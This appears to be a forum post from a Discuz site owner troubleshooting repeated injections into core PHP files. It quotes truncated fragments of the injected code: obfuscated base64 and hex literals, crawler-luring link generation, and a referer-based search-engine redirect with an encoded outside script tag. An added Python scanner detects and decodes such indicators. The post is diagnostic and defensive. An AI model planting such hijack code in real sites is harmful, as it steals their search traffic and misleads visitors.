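function_core.php, discuz_application.php, class_core.php, config_global.php; why does the class_core.php file keep getting infected with injected malicious code? Sometimes class_core.php is modified, sometimes config_global.php is modified. class_core.php often has hijacking code inserted in the part above the header. Viewing the page source shows nothing; it can only be seen with a crawl (fetch) diagnostic.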
To prevent malicious use, only part of the code is attached:

    error_reporting(0);
    $S9 = explode('|',base64_decode('NTguMjQ3fDE4MC4xNTZ8MTgwLjE1NnwxMTcuMTc3fDU5LjE3MnwxNzEuODN8MTE0LjgyfDYxLjE3Mg=='));
    $S22 = ($_GET['id'] > 1000000 || $_GET['tid'] > 1000000 || $_GET['aid'] > 10
    function PostLinks(){
        $S27 = array();
        $S27[]= 'https://'.$_SERVER['HTTP_HOST'].'/archives/'.date('Ymd').'/'.date('Hi').'/index.html';
        return base64_encode(implode('|', $S27));
    }
    define('APP_JACK_DOCUMENTROOT',$_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6174746163686D656E742F666F72756D2F323F30372F'));

It mainly evaluates conditions and generates links, inserting those links to lure search-engine crawlers.
The redirect code is as follows:

    $_config['cache']['type'] = '';
    function call_diy_jump(){
        $jump_ref = explode('|','baidu.|haoso.|haosou.|bing.|google.|sogou.|so.');
        $ref = strtolower($_SERVER['HTTP_REFERER']);
        $jccode='PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcml wdCIgc3JjPSJodHRwczovL2NvdW50Ny41MXllcy5vcmc vY2xpY2suYXNweD9pZD03MjM3MDYwMiZsb2dvPTEyIiB jaGFyc2V0PSJnYjIzMTIiPjwvc2NyaXB0Pg==';
        $S22 = ($_GET['id'] > 1000000 || $_GET['tid'] > 9000000 || $_GET['aid'] > 3000000 || (stristr($_SERVER['QUERY_STRING'],'/')
    call_diy_jump();

It hijacks search-engine traffic to redirect the page.
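
The fragments above share a few recognisable traits: error suppression, string literals hidden behind base64_decode and PACK('H*'), and a referer check against a list of search engines. The following triage scanner is an added example, not code from the original post; the names scan_php, decode_literal and INDICATORS are hypothetical, and the sample input is constructed for the demonstration.

```python
import base64, binascii, re

# Indicator patterns modelled on the traits of the fragments quoted in the post.
INDICATORS = {
    "error_reporting(0)": re.compile(r"error_reporting\s*\(\s*0\s*\)", re.I),
    "base64_decode literal": re.compile(
        r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]{8,})['\"]", re.I),
    "pack('H*') literal": re.compile(
        r"pack\s*\(\s*['\"]H\*['\"]\s*,\s*['\"]([0-9A-Fa-f]+)['\"]", re.I),
    "referer check": re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_REFERER['\"]\s*\]", re.I),
    "search-engine list": re.compile(
        r"(?:(?:baidu|haosou?|bing|google|sogou|so)\.\|){2,}", re.I),
}

def decode_literal(name, value):
    """Decode a hidden string so the reviewer can read what the code conceals."""
    try:
        if name.startswith("pack"):
            raw = binascii.unhexlify(value)
        else:
            raw = base64.b64decode(re.sub(r"\s+", "", value), validate=True)
        return raw.decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None  # not valid hex/base64: report the hit without a decode

def scan_php(source):
    """Return (line_no, indicator, decoded_or_None) for every hit in PHP source."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for name, rx in INDICATORS.items():
            for m in rx.finditer(line):
                decoded = decode_literal(name, m.group(1)) if m.groups() else None
                findings.append((no, name, decoded))
    return findings

# Constructed sample input (not the code from the post).
SAMPLE = """<?php
error_reporting(0);
$a = explode('|', base64_decode('MTAuMHwxOTIuMTY4'));
define('X', $_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F'));
$ref = strtolower($_SERVER['HTTP_REFERER']);
$e = explode('|','baidu.|sogou.|google.');
echo 'hello';
"""

if __name__ == "__main__":
    for no, name, decoded in scan_php(SAMPLE):
        print(f"line {no}: {name}" + (f" -> {decoded!r}" if decoded else ""))
```

A hit is a lead for manual review rather than proof of compromise, since legitimate code also uses some of these calls.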